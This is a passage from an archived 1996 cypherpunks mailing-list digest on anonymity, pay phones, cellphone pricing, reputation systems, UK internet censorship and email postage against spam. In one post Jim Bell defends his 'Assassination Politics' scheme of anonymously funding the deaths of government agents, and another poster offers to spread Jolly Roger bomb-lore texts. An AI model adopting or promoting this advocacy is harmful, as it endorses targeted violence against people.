required for a wiretap." (There go the flea markets and garage sales (for buyers), which are largely anonymous. There goes walking into a store and paying cash for a piece of pipe (could be made into a bomb). There goes cash, period. See next item.) A version for cash: "Cash can be dangerous [illegal purchases, drugs, prostitution, tax evasion, illegal workers, extortion, etc.] -- as can traceable money, especially in/by repressive regimes. Therefore I would favor allowing cash -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." (One has to presume that Dyson would probably not support Chaumian untraceable e-cash, though I doubt she would go for the other examples.) And so on. One can take Dyson's basic argument for why anonymity may be dangerous at times and why it may need to be restricted, limited, or banned, and use these arguments for a variety of other basic freedoms. Essentially, freedom can be dangerous. The world can be dangerous. In fact, it is. (No, Dyson has not called for such restrictons on freedom of movement, freedom of association, freedom to read anonymously. But her argument that she would support anonymity if some form of traceability is built in essentially applies, by the same logic (that it can be dangerous) to a wide variety of other cases.) To summarize: "The Bill of Rights can be dangerous...." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jbugden at smtplink.alis.ca Fri Sep 6 14:39:54 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 7 Sep 1996 05:39:54 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactl Message-ID: <9608068420.AA842043614@smtplink.alis.ca> Audit trails may now be in place, in which case the cost of anonymity is increased to the cost of the lowest denomination card. Think OTP. However, in both Britian and France I have seen defective phones that allowed LD calls but did not deduct the call amount from the card. Obviously, the effect was free LD and these phones were perpetually busy. If audit trails were in place, this problem should have been noticed quickly. As I said, things may have changed for newer systems. James ---------- From: Flying insect killer Sent: Friday, September 06, 1996 1:20 PM To: jimbell at pacifier.com Cc: James Bugden; pstira at escape.com; cypherpunks at toad.com Subject: Re: Anonymous phone calls (was: What is the EFF doing exactl On Fri, 6 Sep 1996, jim bell wrote: > At 10:08 AM 9/6/96 EST, jbugden at smtplink.alis.ca wrote: > >There is another spin possible on the reasons for replacement of pay phones with > >credit card phones. In Canada all new credit card phones are also able to take > >phone cards (which are anonymous). > > Don't be too sure about the "anonymity" of these cards. You don't have to > give your name when you buy or use them, but assuming a large number of > phone calls (to, from different locations) can be associated together after > the fact, your name can probably be fairly easily obtained. > Jim Bell > jimbell at pacifier.com And phone companys that offers phone cards keep track of every call that goes thru each card number. From stewarts at ix.netcom.com Fri Sep 6 14:51:15 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Sat, 7 Sep 1996 05:51:15 +0800 Subject: Anonymous Payphones Re: What is the EFF doing exactly? Message-ID: <199609061807.OAA15460@attrh1.attrh.att.com> At 01:31 AM 9/6/96 -0400, "" wrote: >Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there >are less and less payphones, and all new ones installed, just about, are >those yellow credit card phones. That's not a big problem - you can buy telephone credit cards, anonymously, in your local convenience store. Around here you've got a choice of cards where the announcements are in Spanish and the rates to call Mexico are cheap, cards that come in exact $20 from machines that don't give change, cards with pretty pictures on the front, cards with advertising, etc., as well as cards that are reusable and want some personal information about you to activate. I don't blame phone companies in New York for using non-coin-phones, especially non-monopoly phone companies. Collecting and handling coins is expensive, phones get vandalized to steal the coins, it's harder to change your rates when you need to go to each phone to do it, and people get annoyed at coin phones that charge higher than Bell prices. What I do get annoyed about is that most pay phones won't accept calls, they'll only initiate them. This means that if you call somebody from a pay phone who only has a beeper, or if you don't have a beeper, you can't leave them a useful message to call you back. Part of this is done because of the Great Drug Hysteria, but I suspect part of it is that pay phone companies don't make money receiving calls, so they don't want to tie up their phones doing that; perhaps if they charged money to receive calls as well as initiate them, they'd be willing to receive calls? Not all of them, but it's now one for >one, at least. > >=Millie= >PS: i wrote a fiction book about this a few years ago -- i should have >published. People could've said i was the next nostradamus. :( # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From paul at fatmans.demon.co.uk Fri Sep 6 15:38:58 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sat, 7 Sep 1996 06:38:58 +0800 Subject: Cypherpunk meeting? Message-ID: <842032190.16862.0@fatmans.demon.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hi all, I`m just dashing off a quick note to see how many south eastern UK cypherpunks there are here, preferably in the sussex area, I might organise a meet if we can get enough people to make it worthwhile mail me if you are an experienced cryptographer in the area and would be interested in attending an informal meeting for key signing, discussion and copious beer.... ;-) -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: cp850 iQCVAwUBMi7qLb5OPIRbv66xAQGGqQP/cJI2sWgCc0cR8jlTDbCv0W2hklW5++7K oO23Qs7sxNQziK1lcEzIKX1kbQIng/apR4FEEhWggS+Bvadx3NNpW46BdHTI7IfZ rjE8M4K0EtYcDUZmsAG0pV70b8XKu+v/dogu/BlIFwAUCwR2ocDeIbW88tBXq4ok dcffJFY2Q4Q= =PCNL -----END PGP SIGNATURE----- Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From grafolog at netcom.com Fri Sep 6 15:40:05 1996 From: grafolog at netcom.com (jonathon) Date: Sat, 7 Sep 1996 06:40:05 +0800 Subject: Race Bit: C In-Reply-To: <199609061750.KAA06787@mail.pacifier.com> Message-ID: On Fri, 6 Sep 1996, jim bell wrote: > At 05:05 AM 9/6/96 +0000, jonathon wrote: > used to test out hypotheticals, for example a "SimEconomy." For example, They are very hard to program, and the ones that do exist are based on the usually flawed assumptions that the designers make. EG: taxation is a requirement for government stability > I, for one, would love to be able to program in an immediate 25%+ reduction > computer-based simulation wouldn't just blindly do the cuts, but would also > estimate the secondary and tertiary effects of such cuts, for example Those are very hard to figure out in advance. Silicon Valley, for one, developed because the government closed several military facilities there. Other examples do exist. << I think it was CATO that published a paper showing that closing military bases caused a short term impact in business, but three to five years later, more business, and with greater diversification, than had the military base stayed. However, such development does not occur, when local government authorities do not permit it to happen -- which is the usual state of affairs. << Can a simulation program put cover the situation where a government cries out for more development, and then prohibits it? That is exactly what most city governments do, and some state governments are starting to do. >> > if the average citizen were made aware of how simple the changes were, he'd > be less tolerant of special-interest politics. The average voter doesn't see any further than the bribe s/he is paid by whichever criminal is trying to inflict his/her mode of destruction on them, come the second tuesday of november. xan jonathon grafolog at netcom.com All people in the employ of government agencies are death-dealers. From qut at netcom.com Fri Sep 6 16:05:09 1996 From: qut at netcom.com (Dave Harman OBC) Date: Sat, 7 Sep 1996 07:05:09 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: Message-ID: <199609061850.LAA17248@netcom6.netcom.com> ! At 8:18 AM 9/6/96, tank wrote: ! >Please forward: ! ! > * * * P R E S S R E L E A S E * * * ! > ! > ! >GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES ! > ! > ! >German internetproviders, joined in the Internet Content Taskforce ! >(ICTF), started censoring the Dutch website www.xs4all.nl, containing ! >3100 personal and commercial homepages. This act of censorship is ! >caused by the webpage of a magazine that is banned in Germany, Radikal ! >(http://www.xs4all.nl/ ~tank/radikal/). ! ... ! ! Though my German friends will perhaps feel I am picking on them, this is ! not so (this week Germany is in the hot seat, last week it was ! Singapore....). ! ! A Modest Proposal: ! ! * as Germany is bent on blocking sites which carry this subversive ! pamphlet, "Radikal," let us mirror it on thousands of sites around the ! world. ! ! * when the Germans went into Danmark and insisted Jews wear badges, ! ordinary citizens (and the Danish Royal Family, as I recall) also took to ! wearing these Star of David badges. ! ! * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now ! attached to so many pages were to be joined by a "Star of David"? This Star ! of David symbol could mean "We support freedom to read, and our site ! contains the "Radikal" publication which Germans are forbidden to access." ! ! (I know nothing of how such symbolic campaigns are actually launched and ! managed, so I'm suggesting the hint of an idea. I do think mirroring the ! banned publication (_any_ banned publication, by _any_ government) on as ! many sites as possible is a Good Idea.) Can someone post an uncensored copy here? That's a good start. I could repost Jolly Roger which I think I archived, or post something from Kurt Saxon in de.soc and soc.culture.german for a good start! From qut at netcom.com Fri Sep 6 16:07:33 1996 From: qut at netcom.com (Dave Harman OBC) Date: Sat, 7 Sep 1996 07:07:33 +0800 Subject: [DREK] Neo-Nazis etc. In-Reply-To: <199609061711.NAA05404@charon.gti.net> Message-ID: <199609061843.LAA16712@netcom6.netcom.com> ! : Try to keep in mind that "Nazis" aren't skinheads and other ! : troublemakers exactly, which is to say, those are the first people ! : Hitler got rid of when he came to power. ! : ! : Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we ! : know anyone like that? ! : ! ! Reminded me of the following: ! ! "You think swastikas are cool. ! The real Nazis run your school; ! They're coaches, businessmen, and cops. ! In a real Fourth Reich, you'd be the first to go." Tim May is the Nazi of this list, Mitch Kapor is the Nazi of EFF and Bill Clinton is the Nazi of the USA. Thank you. From dthorn at gte.net Fri Sep 6 16:12:08 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 7 Sep 1996 07:12:08 +0800 Subject: Doing away with govt. people Message-ID: <323077F5.4DF7@gte.net> Gee, if we could just prosecute "the govt." under auspices of the "three strikes" legislation: Gehlen Deal MK/ULTRA "That 'Bay of Pigs' thing" ZR/RIFLE Watergate MH/CHAOS Iran/Contra Phoenix Program BCCI/BNL COINTELPRO INSLAW Waco, etc. Just say "Three strikes and you're (what?)" From dee at cybercash.com Fri Sep 6 16:18:25 1996 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Sat, 7 Sep 1996 07:18:25 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) In-Reply-To: <199609061745.KAA09285@scn.org> Message-ID: Of course, as you say, security needs to be improved also. See draft-eastlake-muse-00.txt in the IETF shadow directories. Donald On Fri, 6 Sep 1996, SCN User wrote: > Date: Fri, 6 Sep 1996 10:45:57 -0700 (PDT) > From: SCN User > To: dee at cybercash.com > Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd) > > > > >Suggest you look at draft-eastlake-internet-payment-*.txt in the > >IETF shadow directories. I don't think any one step will solve all > >our spam problems but I wouldn't mind spending, say, 5 cents for each > >real piece of mail I sent outside my company and if end machines charged > > >5 cents per piece of ouside mail received, I think spamming would be > >crippled. (Note that with bad guy lists, you could collect the money and > >then just throw away the mail.) > Why should I pay for mail I can't control? > > Before charges like this can be implemented, protocols/security/etc > need to be improved to accurately indentify the sender. > > > -- > ------------------------------------------ > There are no facts, only interpretations. > I always wanted to be somebody, but I should have been more specific. > Food for thought is no substitute for the real thing. > ===================================================================== Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) http://www.cybercash.com http://www.eff.org/blueribbon.html From frissell at panix.com Fri Sep 6 16:24:29 1996 From: frissell at panix.com (Duncan Frissell) Date: Sat, 7 Sep 1996 07:24:29 +0800 Subject: electronic offshore banking Message-ID: <2.2.32.19960906192055.008a61e0@panix.com> At 07:25 PM 9/6/96 +0300, J�ri Kaljundi wrote: > >Are there any good offshore banks that would allow you to use your account >over the Internet? > >I know European Union Bank www.eub.com is on of those available, but their >US$ 25.000 minimum deposit is too stupid. > >J�ri Kaljundi >AS Stallion >jk at stallion.ee > > Does Compuserve count as the Internet? It soon will be the Internet since they are dropping their proprietary software. TSB (including TSB's Jersey subsidiary) has a new net-based banking arrangement using Compuserve. See the TSB web site http://www.tsb.co.uk/pcbank.htm or Compuserve (GO TSB). TSB in Jersey (or predecessor institutions) has been there since the 1820s or so. DCF From dee at cybercash.com Fri Sep 6 16:27:39 1996 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Sat, 7 Sep 1996 07:27:39 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) In-Reply-To: <9609061904.AA00879@ch1d157nwk> Message-ID: No, I wouldn't be willing to pay $50.00 to have sent that message to cypherpunks. But I would certainly have been willing to pay some smaller non-zero amount, like a dollar (and then there is the question of the entities I blind copied it to ...). But I never claimed that charging was the answer to everying or compatible with the cypherpunks anarchy. It just seems like a useful tool to have available. Based on (hopefully secure) message characteristics, you want to encourage some mail and probably give it extra priority, other mail you might want to charge a penny or two for, and known junk sources you want to charge as much as you can and then trash the mail. Probably remailers should sign messages so you can easily configure to let their mail in if you want to get it. But there should still be appropriate social and legal action against network abusers as well. Donald On Fri, 6 Sep 1996, Andrew Loewenstern wrote: > Date: Fri, 6 Sep 96 14:04:51 -0500 > From: Andrew Loewenstern > To: "Donald E. Eastlake 3rd" > Cc: cypherpunks at toad.com > Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd) > > Donald Eastlake writes: > > I don't think any one step will solve all our spam problems > > but I wouldn't mind spending, say, 5 cents for each real piece > > of mail I sent outside my company and if end machines charged > > 5 cents per piece of ouside mail received, I think spamming > > would be crippled. (Note that with bad guy lists, you could > > collect the money and then just throw away the mail.) > > So would you be willing to pay $50.00 for this message you sent to > cypherpunks? If there are a thousand recipients and each one charges $0.05 > for the priveledge of you sending it e-mail.... It seems like such a scheme > would not only cripple spam, but public discussion lists like this one. > > > andrew > ===================================================================== Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) http://www.cybercash.com http://www.eff.org/blueribbon.html From andrew_loewenstern at il.us.swissbank.com Fri Sep 6 16:39:15 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Sat, 7 Sep 1996 07:39:15 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) In-Reply-To: Message-ID: <9609061904.AA00879@ch1d157nwk> Donald Eastlake writes: > I don't think any one step will solve all our spam problems > but I wouldn't mind spending, say, 5 cents for each real piece > of mail I sent outside my company and if end machines charged > 5 cents per piece of ouside mail received, I think spamming > would be crippled. (Note that with bad guy lists, you could > collect the money and then just throw away the mail.) So would you be willing to pay $50.00 for this message you sent to cypherpunks? If there are a thousand recipients and each one charges $0.05 for the priveledge of you sending it e-mail.... It seems like such a scheme would not only cripple spam, but public discussion lists like this one. andrew From pgruber at netzone.com Fri Sep 6 16:48:50 1996 From: pgruber at netzone.com (Pete Gruber) Date: Sat, 7 Sep 1996 07:48:50 +0800 Subject: Factory Memory Message-ID: <199609061547.IAA01621@nz1.netzone.com> Memory prices have finally stabilized after serious price drops since the beginning of this year. With Christmas demand high for electronic gadgets, memory supply is dwindling and higher prices are sure to follow. Now is a good time to upgrade memory to satisfy those memory hungry software packages. We are able to offer memory 72 pin, 70ns non-parity, SIMM memory boards at: 32 mb=$221 16 mb=$89.99 8 mb=$39.99 4 mb=$19.99 MANY more styles, sizes, speeds, are available. Check out our website - http://www.gruber.com for a complete list, or call us at 800 658-5883 Toll free or (602) 863-2655 for more details. Thank you Jillene Barr Gruber Industries Incorporated From tcmay at got.net Fri Sep 6 16:58:50 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 07:58:50 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones Message-ID: At 6:08 PM 9/6/96, stewarts at ix.netcom.com wrote: >is done because of the Great Drug Hysteria, but I suspect part of it >is that pay phone companies don't make money receiving calls, >so they don't want to tie up their phones doing that; perhaps if >they charged money to receive calls as well as initiate them, >they'd be willing to receive calls? I am about to start worrying about "junk phone calls" more so than I have been. I just bit the bullet and bought a digital cellular phone, with a nifty rate plan called Digital Flex: I get unlimited free airtime from 7 p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south of Salinas to north of Santa Rosa and as far east as the Central Valley. In other words, the entire Bay Area and outlying communities. I can send and receive calls over this entire region, from anywhere in the region (of course), without any charges. The downside is that calls _from_ or _to_ my phone during "business" hours are charged 42 cents a minute, airtime (tying up a channel and all), plus whatever other fees may be applicable at each end. Thus, every "junk call" I get trying to get me to buy aluminum siding, or to vote Democratic, or to switch my long-distance carrier (!), costs me a minimum of 42 cents, depending on how fast I can realize who they are and get rid of them ("Let me forward you to Jim Bell's AP hotline..."). Needless to say, my cellular number is only going out to a handful of folks, and with recommendations that they not call me during business hours unless its urgent. I believe this kind of pricing model is likely to be common. We can debate til the cows come home whether flat rate pricing makes sense, for ISPs, for cellphones, for other things. Relevance to Crypto? The "junk e-mai" issue, calls for regulations (which I'm against), technological solutions (Caller ID lets users decided to accept a call or not....same idea could be used with e-mail, a la Hal Finney's "You have a message of size X from size Y entitled Z" proposal for positve acceptance of remailed messages), and the value of True Names (and True Numbers). I'll be real pissed if my new cellphone number ends up in the hands of mass marketers, given that I don't plan to give it out to merchants, to organizations, etc. (I'm probably inviting malicious use by one of my enemies here on this list...there may be ways I don't yet grok to "look up" cellphone user numbers. I can then get hit with denial-of-service attack just by having this 42 cents a call situation. I hope no one is this malicious.) P.S. The phone is a Motorola Micro Digital Lite, a little bugger with a zillion features. It can vibrate silently instead of ringing (phone sex?), it can store 100 alphanumeric name/number combinations, it even has a data port for use with a modem (probably a special modem, and certainly a chore to set all the battery-powered stuff up properly...I'll report on it if it works). The cost was about $200 for the phone, after the rebates, kickbacks, etc., and after "sales tax on the pre-kickback price" was added back in (California has a tax collection scam where sales tax is assessed against the "real" price of some good or service....imagine the possibilities if this is extended to cover other such areas). The "Digital Flex" plan from Cellular One is $20/mo for the basic plan, and then $15/mo on top of that for the unlimited evenings and weekends use. (This could easily save me the amount I often spend in a month just yakking with friends and girlfriends who live over the hill in the Valley.) These rates have really come down a lot. The unlimited calls is what sold me. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Fri Sep 6 17:10:39 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 08:10:39 +0800 Subject: Subject: Re: Race Bit: C Message-ID: <199609062013.NAA05932@mail.pacifier.com> At 02:31 PM 9/5/96 -0600, Anonymous wrote: >> If I understand you correctly, it is OK for a government to >> institute violence against the residents of the land it claims >> dominion over, but it is not acceptable for the inhabitants of >> that piece of land to respond in self defence. > >I will say this: > >No, government initiation of violence (such as in Waco, Ruby Ridge, etc.) is not OK, >and AsPol initiation of violence is not either. This can lead into a long argument about >just _when_ violence is initiated, where opinion is more important than fact, but IMO: > >Randy Weaver was not initiating violence. >David Keresh was not initiating violence. >Pot growers and smokers are not initiating violence. No argument here... > But >Mr. Bell, if he follows through on his scheme, *will* be initiating violence. His scheme, >while it can sound tempting (especially every April 15th!) has no guarantee that it will >_only_ be used against the Lon Horiuchis of our government, Life generally doesn't come equipped with any guarantees. Some people object to private ownership of guns, on a similar theory that "there is no guarantee they won't be used against innocent people." Others (most of us?), particularly libertarians challenge this, pointing out that it is the abuse of a right which should be punished, rather than curtailing a right simply because a small minority abuse it. To the extent we believe the latter argument, we are accepting the idea that a "guarantee" is not necessary. AP, ultimately, is a tool that can be used well or used badly. I advocate using it well. >in fact, it may be said it >is not guaranteed to not be used against Mr. Bell himself, as many have joked. Check out what I wrote at the end of AP part 7: "Terror, too, because this system may just change almost EVERYTHING how we think about our current society, and even more for myself personally, the knowledge that there may some day be a large body of wealthy people who are thrown off their current positions of control of the world's governments, and the very-real possibility that they may look for a "villain" to blame for their downfall. They will find one, in me, and at that time they will have the money and (thanks to me, at least partially) the means to see their revenge. But I would not have published this essay if I had been unwilling to accept the risk." Long before I started publicizing AP, I had made my decision. > There are two roads to take in life, convincing and coercing others. > I think that the former is still possible, Mr. Bell and many others disagree. In a quote attributed to Al Capone, he said something like, "You can get more with a kind word and a gun, than you can with a kind word alone." Capone was probably talking about offense, but the principle is even more applicable to _defense_: If you have a gun, you can prevent somebody else from coercing you, and ensure that they have to CONVINCE you! AP is like a gun which can be aimed at the agents of the majority, to prevent them from violating the rights of the minority. > I worry that abuse of the very young >and weak (for now) anonymity system for the purpose of initiating, rather than exposing, >violence will lead to more government violence than we already have. First, AP only "initiates" if it is used against people who have not, themselves, initiated force or fraud. I contend that while this is not impossible, it is improbable. If you choose a target that "everyone" else agrees has initiated force, you'll only have to cough up a dollar, or a quarter, or even a dime and you'll all get your wish. Randomly select a guiltless individual and you'll be the only one paying, not to mention the fact that you might have trouble finding an AP organization that'll take your malicious donation. This translates into: "They'll exist, but due to lack of competition they'll be able to insist on taking a healthy cut of their own." In addition, if you attempt to use AP against somebody who already knows it's probably you (say, an ex business partner you just ripped off?), its anonymity won't be much use. > Perhaps I am >wrong and there is no hope; but if so, that means another revolution. Revolutions are >very romantic sounding, to those who have not been in a war. The whole point of crypto-anarchy is that revolutions are CHANGING. Think of a revolution like an earthquake: It's the sudden release of stress built up over years or decades. In an earthquake, if that release could be spread out from the seconds or minute it normally takes, to hours or even days (or better yet, continuously) the amplitude would be far smaller and you probably wouldn't even notice it. Likewise, politically, the only reason you get revolutions is because political leadership gets entrenched and resists change. Even in democracy, which is supposed to facilitate changes, eventually the politicians learn to play one group off another, leading to the same kind of social stratification problems that even dictatorships have. Jim Bell jimbell at pacifier.com From janzen at idacom.hp.com Fri Sep 6 17:36:50 1996 From: janzen at idacom.hp.com (Martin Janzen) Date: Sat, 7 Sep 1996 08:36:50 +0800 Subject: Reputations Message-ID: <9609062100.AA29557@sabel.idacom.hp.com> TCM> I strongly disagree. It's quite possible for Person A to quickly convert TCM> his reputation to Person B to a _negative_ value. Real quick, in fact. GB>I don't see how there can be such a thing as negative reputation GB>capital. Wouldn't that mean B believes the opposite of what A says? B wouldn't necessarily believe the _opposite_, but if R(A,B) is negative, then B would treat whatever A says with greater skepticism. ("Consider the source.") Alternatively, R(A,B) << 0 might mean that B has decided that A's posts tend not to be worth even the time it takes to read them, and has set his killfile accordingly. (Think of someone who makes unsupported assertions: this is not a reason to believe the _opposite_ of what he says, but to ignore him.) GA>If you anti-believed someone in a consistent manner, couldn't they exploit GA>that? Sure; see any number of Cold War spy novels for examples. One point that I think deserves mention, but that I haven't seen yet in this thread, is that R(A,B) is contextual; it should be R(A,B,subject). To accept the word of an authority outside his area of expertise is a common logical fallacy. (Think of political endorsements by famous actors.) Conversely, so is dismissing something just because its proponent has a negative reputation in another context. (At the risk of flirting with Godwin's law, an example might be that just because a certain well-known evil person liked Karl May novels and music by Wagner, this does not in itself make these things bad.) GB>For instance, when a certain infamously-low-reputation (deservedly so) GB>individual recently joined the cypherpunk lists, others who had endured GB>him in the past tried to relay their impressions of him. It proved very GB>difficult to convey, and they were somewhat attacked for their efforts GB>and not entirely believed. GB> GB>In other words, he *could not* spend down to 0, despite years of GB>unflagging effort. I'd interpret this situation a bit differently. In the eyes of many list members, this individual _did_ spend down to 0 -- and below, I'd argue, based on the number of people who announced changes to their killfiles. But this was because of his actions on the list; it was _not_ because of the impressions of others. Most of the regulars on this list are, IMHO, logical enough thinkers, and of sufficiently independent mind (to put it mildly), to wait and see for themselves. Results in other, more conformist or authoritarian groups may vary... In other words, it would appear that "reputation capital" is difficult to create or destroy based only on the word of others; it has to be earned. (Hmm, is it easier to destroy than to create -- are we more likely to adjust our R(A,me) score downward based on what others say about A?) TCM?> But TCM?> what if the American Heart Association publishes a detailed study on the TCM?> fat levels of MacDonald's products and declares it to "Dangerous." The TCM?> effect will probably be greater, as R (AHA, many people) = high, and by the TCM?> kind of Dempster-Shafer belief calculus I discussed a few months ago, the TCM?> rep of the AHA propagates semi-transitively to the rep of MacDonald's. TCM?> TCM?> (This all happened recently, with the famous studies of fat levels of movie TCM?> theater food...sales dropped almost overnight, and now the fat levels of TCM?> popcorn, etc., have been changed for the better.) I agree with the first paragraph; however, I'm not sure that the second paragraph gives an example of this. The high levels of saturated fats in movie popcorn were (as I recall) publicized by the previously little- known "Center for Science in the Public Interest", a group with nowhere near the reputation capital of the AHA. Their claims were taken seriously, not because the group itself was particularly reputable, but because the results were dramatic and easily verified. A better example might be that of Surgeon-General Koop vs. the tobacco companies. GB>I've already made the points I wanted to make, so I may not have further GB>comments. TCM>Nor me. Well, I've probably said enough, then, especially considering that no one is paying attention any longer. Wouldn't want excess verbiage to lower what little reputation capital I may have here... :-) -- Martin Janzen janzen at idacom.hp.com From declan at well.com Fri Sep 6 17:37:05 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 08:37:05 +0800 Subject: Global Alert -- Hysteria in the U.K. threatens Net Message-ID: [For more details and background, check out http://www.eff.org/~declan/global/ and http://www.hotwired.com/netizen/96/36/index4a.html for my U.K. cyberporn fearstorm piece. --Declan] September 6, 1996 *** GLOBAL ACTION ALERT *** FOR IMMEDIATE RELEASE - Please redistribute this document widely with this banner intact - Redistribute only in appropriate places & only until 30 September 1996 Global Alert: Hysteria in the UK Threatens Free Speech on the Net The Sunday, August 25 issue of the London Observer splashed across its front page a sensationalized account of child pornography on the Internet, falsely accusing two Internet Service Providers, Clive Feather of Demon UK (a full service site) and Johan Helsingius of anon.penet.fi (an anonymous remailer) of involvement in the distribution of child pornography. Why were these accusations made? Demon UK had refused to remove a broad range of sexually-oriented newsgroups identified by UK authorities as possible sources of child pornography, and anon.penet.fi was identified without substantiation as a source for `90% of child pornography on the Internet.' In fact, Demon UK was simply acknowledging that Internet Service Providers (ISPs) cannot police the data that traverses their systems, or assume responsibility for it, any more than the post office can assume responsiblity for content that is sent through traditional mail. And Helsingius, contrary to allegations in the London Observer, had long before restricted the size of files that could be transferred through anon.penet.fi, effectively eliminating the possibility that binary files containing pictures could be exchanged. This story was extreme, but not without precedent: much has been written associating the Internet with those who make and distribute child porn, and there have been many attempts to hold ISPs responsible for objectionable or illegal content. ISPs are not content providers; they channel content provided by their users. It is outside the scope of the ISP to monitor, evaluate, and attempt to remove objectionable content. In fact, any attempt by an ISP to block particular kinds of content will ultimately be fruitless, as providers of that content will simply find alternate channels of distribution. Moreover, it is wrong to assume that the Internet has no rules, and is friendly to the exchange of objectionable materials. In fact the Internet is a `virtual community' of users with a distinct culture incorporating diverse views but finding consensus in opposition to censorship and access control. There is also strong opposition to the exploitation of children; in fact, many Internet users have cooperated in attempts to identify those who create and distribute child pornography. Summary: The physical abuse and exploitation of children is a very real problem demanding a proactive response, however we vigorously oppose attempts to stifle the free and open exchange of information over the Internet in the mistaken belief that overbroad restrictions on the flow of information will protect children from abuse. We support Demon UK and anon.penet.fi (which Helsingius has shut down), and deplore the Observer's lurid attempt to make respectable Internet providers the "cause" of a problem for which they have no responsibility. The Observer story is not the first of its kind: it represents an ongoing confusion about a complex new medium. Unfortunately this misunderstanding has become a global problem, represented in proposed or enacted restrictive legislation as well as negative press. Consider these possible analogies to the Internet: - The Internet is a vast mail system, like a post office. Would you favor a law that required postal authorities to open each piece of mail and evaluate its acceptability? - The Internet is a huge library system. Would you favor a law that would restrict information a library can provide? - The Internet is a collection of virtual communities. Would you favor a law that required routine searches of your community? Our position: These measures constrain everyone because of the misdeeds of a few. It is more sensible to find and deal with the sources of child pornography than to impede the flow of data over the Internet. The imposition of censorship and additional constraints applied to ISPs will not solve the existing problem, but will create a new problem, a barrier to the free and democratic exchange of ideas. For background on global privacy and liberty issues: http://www.eff.org/~declan/global/ For press contacts, and for more information about the Internet, see homepages for the signatories to this message: ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei.html CITADEL - Electronic Frontier France * pforsans at in-net.inba.fr CommUnity (UK) * http://www.community.org.uk EFF (USA) * http://www.eff.org EFF-Austin (USA) * http://www.eff-austin.org Electronic Frontier Canada * http://www.efc.ca/ Electronic Frontiers Australia * http://www.efa.org.au/ Electronic Frontiers Houston (USA) * http://www.efh.org Elektronisk Forpost Norge (Electronic Frontier Norway) * http://www.sn.no/~efn Fronteras Electronicas Espan~a (Electronic Frontiers Spain) * http://www.lander.es/~jlmartin/ HotWired * http://www.hotwired.com/ ### From aba at dcs.ex.ac.uk Fri Sep 6 17:41:39 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 7 Sep 1996 08:41:39 +0800 Subject: Job for netescrow ? (was Secure anonymouse server protocol... In-Reply-To: <9609051155.AA14504@clare.risley.aeat.co.uk> Message-ID: <199609061322.OAA01150@server.test.net> Peter Allan writes on cpunks: > In the talk about replyable nym-mailers I haven't > yet seen netescrow mentioned. > > You DID all read this ? > > [Matt Blazes Oblivious Key Escrow paper] > > This all hinges on a policy to be followed by archive holders defining > the conditions under which they release their shares. > This could be receipt of a signed request from the owner (remailer). > > Maybe the table relating nyms to reply addresses could be stored in > netescrow style so that captured remailers reveal nothing. The problem > of operator coercion is not addressed by this. Just to 